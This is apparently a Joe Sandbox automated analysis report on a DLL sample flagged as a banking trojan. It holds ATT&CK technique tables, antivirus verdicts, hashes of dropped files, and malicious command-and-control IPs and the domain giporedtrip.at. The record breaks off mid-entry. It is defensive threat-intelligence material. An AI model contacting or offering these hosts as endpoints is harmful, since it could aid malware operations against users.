Source: | Check user administrative privileges: |
Source: | API coverage: |
Source: | Process information queried: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Thread delayed: | ||
Source: | Thread delayed: | ||
Source: | Thread delayed: |
Source: | Code function: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Code function: |
Source: | Process token adjusted: | ||
Source: | Process token adjusted: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Network Connect: | ||
Source: | Domain query: | ||
Source: | Network Connect: | ||
Source: | Network Connect: |
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: |
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: |
Source: | Memory protected: | ||
Source: | Memory protected: | ||
Source: | Memory protected: | ||
Source: | Memory protected: | ||
Source: | Memory protected: | ||
Source: | Memory protected: | ||
Source: | Memory protected: | ||
Source: | Memory protected: | ||
Source: | Memory protected: |
Source: | Memory allocated: | ||
Source: | Memory allocated: | ||
Source: | Memory allocated: |
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: | ||
Source: | Memory written: |
Source: | Thread register set: | ||
Source: | Thread register set: | ||
Source: | Thread register set: | ||
Source: | Thread register set: | ||
Source: | Thread register set: | ||
Source: | Thread register set: |
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: | ||
Source: | Thread created: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: |
Source: | Code function: |
Source: | Key value queried: |
Source: | Code function: |
Source: | Code function: |
Source: | Code function: |
Source: | Code function: |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1 Valid Accounts | 2 Windows Management Instrumentation | 1 Valid Accounts | 1 Valid Accounts | 1 Obfuscated Files or Information | OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 Data Encrypted for Impact |
Default Accounts | 3 Native API | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 File Deletion | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | Exfiltration Over Bluetooth | 2 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | 813 Process Injection | 1 Masquerading | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Valid Accounts | NTDS | 25 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 12 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Access Token Manipulation | LSA Secrets | 1 Query Registry | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 21 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Security Software Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | 813 Process Injection | DCSync | 21 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Rundll32 | Proc Filesystem | 3 Process Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction | |
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 1 System Owner/User Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | ||
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | 11 Remote System Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop | ||
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rename System Utilities | Keylogging | 1 System Network Configuration Discovery | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
24% | Virustotal | Browse | ||
100% | Avira | HEUR/AGEN.1211191 |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | HEUR/AGEN.1108168 | Download File | ||
100% | Avira | HEUR/AGEN.1108168 | Download File |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
giporedtrip.at | 91.203.174.38 | true | true | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
true |
| unknown | |
true |
| unknown | |
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| low | ||
false |
| unknown | ||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
211.40.39.251 | unknown | Korea Republic of | 3786 | LGDACOMLGDACOMCorporationKR | true | |
138.36.3.134 | unknown | Brazil | 264562 | TEXNETSERVICOSDECOMUNICACAOEMINFORMATICALTDBR | true | |
91.203.174.38 | giporedtrip.at | Uzbekistan | 47141 | LITTEL-ASRU | true | |
121.136.102.4 | unknown | Korea Republic of | 4766 | KIXS-AS-KRKoreaTelecomKR | true | |
61.98.7.132 | unknown | Korea Republic of | 9318 | SKB-ASSKBroadbandCoLtdKR | true |
IP |
---|
192.168.2.1 |
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 558657 |
Start date: | 24.01.2022 |
Start time: | 11:09:22 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 15m 33s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | 61ee6edf7de65.dll |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 45 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 2 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.bank.troj.evad.winDLL@48/34@6/6 |
EGA Information: |
|
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, UsoClient.exe, wuapihost.exe
- TCP Packets have been reduced to 100
- Excluded IPs from analysis (whitelisted): 23.211.6.115
- Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
- Execution Graph export aborted for target mshta.exe, PID 6024 because there are no executed function
- Execution Graph export aborted for target mshta.exe, PID 6808 because there are no executed function
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size exceeded maximum capacity and may have missing disassembly code.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description |
---|---|---|
11:10:30 | API Interceptor | |
11:10:39 | API Interceptor | |
11:10:44 | API Interceptor |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 11606 |
Entropy (8bit): | 4.883977562702998 |
Encrypted: | false |
SSDEEP: | 192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr |
MD5: | 1F1446CE05A385817C3EF20CBD8B6E6A |
SHA1: | 1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D |
SHA-256: | 2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE |
SHA-512: | 252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 0.9260988789684415 |
Encrypted: | false |
SSDEEP: | 3:Nlllulb/lj:NllUb/l |
MD5: | 13AF6BE1CB30E2FB779EA728EE0A6D67 |
SHA1: | F33581AC2C60B1F02C978D14DC220DCE57CC9562 |
SHA-256: | 168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F |
SHA-512: | 1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 408 |
Entropy (8bit): | 5.01293234302818 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJAsNiWVMRSRa+eNMjSSRrjEzxevVSRNveKP8nQe3CGy:V/DTLDfuH0Wl9eg5r4NevU1eKPJeyGy |
MD5: | 35EAB9A45B1CC09A0099A179AD3DCFE5 |
SHA1: | 42939AC7047BC372300FDD21624100E5C9F83B7F |
SHA-256: | EEEECB79A83F234A098D4E685F9649E562EE2C5180DA03CE782DF3F95D7EB5A7 |
SHA-512: | 03DB096CD43E298A526507BE3252F718516E26ECB50400D052B9C26E76EB89F950770696F2034FD9031E3421EE5F7E225D985BFD92CC51338EC19854C85017C1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 375 |
Entropy (8bit): | 5.22338928296367 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fcBzxs7+AEszIN723fcQx:p37Lvkmb6K2aEBWZETaEQx |
MD5: | DBEC98CFE2AE1215A758F472B026FF34 |
SHA1: | 4605DD9744FEB806A00FD8E6CCB25F275B577C73 |
SHA-256: | 70696285444D57D8BEDBA105CDA7481AA7CF4D62EFC79C1454B7EF659C1ED5C3 |
SHA-512: | FDD7838716515157ADB10B9F446B31298EEE82077F34EFF970618F45E42C593E1626D293B4C5C7E812B92CE06C1C51D6E8BFEA42A5A8BE1D72620B51B39DDAEA |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.623929794032503 |
Encrypted: | false |
SSDEEP: | 48:6WgXE7S5FwYXok+G/W8JU1AZX1ulO3a3/4q:lr7S5ekf+YeqK |
MD5: | F163C1D1CECCF46250870200E14C6929 |
SHA1: | B880A02F929418A0BD6F42F97AC509BB0588BC84 |
SHA-256: | 673DA59906C2CA9646D29EC32569658519AFDA87BC3E730AD591344C3F1CE861 |
SHA-512: | DDE28C0AAEC0D08B9B24E4633375C53AB08B2AEFB00520226DD5AD6215B1E82A438DBB10C7AEAF90A505E4BCAF1F951FDEFA0470A95009D8F96DB78A7692C024 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 872 |
Entropy (8bit): | 5.317124959482677 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6K2aEWETaE5KaM5DqBVKVrdFAMBJTH:Akka6CtE+cKxDcVKdBJj |
MD5: | D7548F253CD5F22DC97E67EE293CE7CE |
SHA1: | 7786139CF9874997146067249B9A194A1D3939ED |
SHA-256: | 1A87A592B08B172333924B6E5CA8FC7C3CA00778B01225E805B9359A0BDAF964 |
SHA-512: | EA0B648ED19690B0028DCACCD2E0714F4B0ACA2DC4FAF11EA31A31B0F6705DD1A5CDCE9BA3B54E98C09850D7B3BAB3B8D55D574F83E53E30863A9C7588362578 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.1086397726225687 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryEXnak7Ynqq/XwPN5Dlq5J:+RI+ycuZhNOXnakS/XwPNnqX |
MD5: | D112602496AF629102D67B4B882A7DA0 |
SHA1: | 71FB2977E08E3D38CAE1E0C4D17AF4B7F81CDFFE |
SHA-256: | 8D0A39E3B8AE49DCBD14D32C1BE64B1DB33A7223A7D8E3270C54D41F4B236A12 |
SHA-512: | FDA136B3AD8351A7C7C5C401FC94D62089E4996A488435B3CC68595933B1C0801366F5EFA4E9FCC6CE8AE1667E17F3C9F5401523BE9A1C31F0EB76FB744FFDEA |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1336 |
Entropy (8bit): | 3.996791252234021 |
Encrypted: | false |
SSDEEP: | 24:HkFm9na7CIVaHEhKdNwI+ycuZhNYakSkPNnq9Sd:2c2Kdm1ulYa3kq9C |
MD5: | 52DBB7ABE93AAC35F9B00E0041FAC3F5 |
SHA1: | EE0D79AB73BAB6E34E69C8D062B319DBD5E4CB6D |
SHA-256: | 599822F45B466D37E66ECD283E3087F01A43C68AA0F85D91D853EA15D7979D76 |
SHA-512: | 9DBB88BF368342A9D3E579B59505A68814BDE76D30451409801EB328883997A701B8D7EE294AD087DBE46D052687E315BD69B3DD98FE4BB1EE3EC75A5B2A58A4 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1336 |
Entropy (8bit): | 4.006521464895929 |
Encrypted: | false |
SSDEEP: | 24:HxFm9ma0yuaH3hKdNwI+ycuZhNOXnakS/XwPNnq9Sd:wJrRKdm1ulO3a3/4q9C |
MD5: | 1D8558748ED793C6050F5A2E5572D113 |
SHA1: | 27D070489053E58906D376D760150CE715E88C86 |
SHA-256: | 007D15A992CB63B600232A1E43C4C430271CB6B513E8538CC25C4B2C544BA65E |
SHA-512: | B5A37C47C86180073DF88121AF5B4A37FD0B024A0C94C7F14AEBF9AD8BE12362FD648109A7723F157A4091BAD2D5A3E7C84007C0B2A44EE3E0627C14B51A643B |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1336 |
Entropy (8bit): | 3.988707873560221 |
Encrypted: | false |
SSDEEP: | 24:H3Fm9Uatw9cRqOaH1fhKdNwI+ycuZhNXakSpPNnq9Sd:0tTRqLV5Kdm1ulXa3Lq9C |
MD5: | F9AE76ADEB946619CCD136219AB83EBC |
SHA1: | FCB9A6777045F64617F751F96957B235A47A757B |
SHA-256: | B79D63E16A61C19E5EE50230B0143BE2C4AD2DF81EC7B4FEEFF432025ACDBDDA |
SHA-512: | 9DF724F487DAEBE62AD4702C4BF25FE175B232E24BE71F4E35206A117DF1665255299108EA83ADE96DAC2D8CD5C7181AADBCB6688BEBDA805626BFD21F0E141B |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1336 |
Entropy (8bit): | 3.9940771285616306 |
Encrypted: | false |
SSDEEP: | 24:H5Fm9na/9bXm/aHvhKdNwI+ycuZhNDBakSgmPNnq9Sd:5/9b/pKdm1ulDBa3gaq9C |
MD5: | 98893A1D42AF866B0F54D4FE368CBD5E |
SHA1: | B77C376C7769D47862458D89755015A3FA49B1E3 |
SHA-256: | 2C720A7C79425332A9E0E88242C1EB733F1C8A677833F78CA412B3953F6A3D29 |
SHA-512: | 3B9247CCD6A1E0FD9F04791FD3EF4E874B0115BF99A9696747A63C70480E81FE03AC2653231CD298C904DDDAEEA9257437060D3211356FE204C5196EAA868995 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.1130003120917578 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryGak7YnqqkPN5Dlq5J:+RI+ycuZhNYakSkPNnqX |
MD5: | EDBBDC9948E1C647F92420624B606E4D |
SHA1: | E3DDECF117CC5C8B855538733A2E6DD9AB13F989 |
SHA-256: | F0FDDCBF33459AC7738A011F4D9EAF4CA133B9F7303F78C2BA791E9F101B9E4E |
SHA-512: | 3EE0BE7961D34BFCFBCACE071561855E00C1C2935D10F45CA0C088869E31EC76F7743174F04507A425804E023CCBA82E907FDF8FDDF136C69E0C8677E5ED1F34 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 404 |
Entropy (8bit): | 5.019892496194437 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJyLHMRSR7a1maLXKqoSRa+rVSSRnA/fQTbIOktwy:V/DTLDfucj3aLXKqj9rV5nA/IT8ORy |
MD5: | 04CA9F3DD2F71BC69A66232592BD29B7 |
SHA1: | 12724CB97FE30A8B84901648B3653B9AC8FB2F73 |
SHA-256: | DBC22FFC06EBCB8F7E00BB962CA175EFFBBDF0DEBE7A2E4D288A8735C5C27DB1 |
SHA-512: | 383C82A91A354A95E9887E9731852788F466C461EA58A016532E4B07A3E19A97C525B4B579B86A4681BF3DBACFA6B65C8F11032B904737C287A6A5498E4EEB4E |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 375 |
Entropy (8bit): | 5.267076526526121 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723f4BcHUzxs7+AEszIN723f4B2x:p37Lvkmb6K2aEWZETaB |
MD5: | C9383FA41DC988BDB143785D8AF21F8E |
SHA1: | 50F307AA50C261190CF8483EA752DA26C0BABC4C |
SHA-256: | 0D83097E96BED92D0D80BCE70B500D61C4A177690BC173B97B2743BA6AE346EE |
SHA-512: | 6AEFD2A95C449DD2AFC0CA0A96E4B99678E4EFDC6B40A5B23F9044962B28D723C321A5075C96A24C967FE9F9B3154C6E08EBAB67C24F0541316665E6C5E4A728 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.623285217450161 |
Encrypted: | false |
SSDEEP: | 24:etGSuW8OmU0t3lm85nt4tdalqQg6ASS41lI+tkZfQB85tVUWI+ycuZhNYakSkPNq:6uQXQ3r5eXa1+xJQyB31ulYa3kq |
MD5: | 3D44991528B31B2492D087F27228A85D |
SHA1: | 4DB4C06B60812F7EE5F4AA6E0CFF86C625E9E5CF |
SHA-256: | 26CF5106FC2D30A9A605EC56AE32BE1BF6224318DE9320F0A9873F21DE341CED |
SHA-512: | 3A804AB0119490C015CACAA29452D07B3A6BA673DEA71B11FB87D25A1F2886A888B84D77975D1284890731A194D1C2E453B299F45166181B15797B23B7FC3E12 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 872 |
Entropy (8bit): | 5.329634713423145 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6K2alETakKaM5DqBVKVrdFAMBJTH:Akka6ClE+kKxDcVKdBJj |
MD5: | 4F092FEEE1A852153F061DEA7821027D |
SHA1: | 2DA69C503AC965ED588A818FEBA4A2CCD7F1B4F7 |
SHA-256: | 3A56BC18D26E454422E4DF81A2489EEDFD223F5855DBA7E40FD335D942F3EC73 |
SHA-512: | C39D6307A1EC663FD52186B35C979769612876C1F90BA200DEAA0726650DDF41E0EE6AA9F938323B59EE1D1362ABCF2B8A6941AE5F9780C16502148FC2661BEA |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
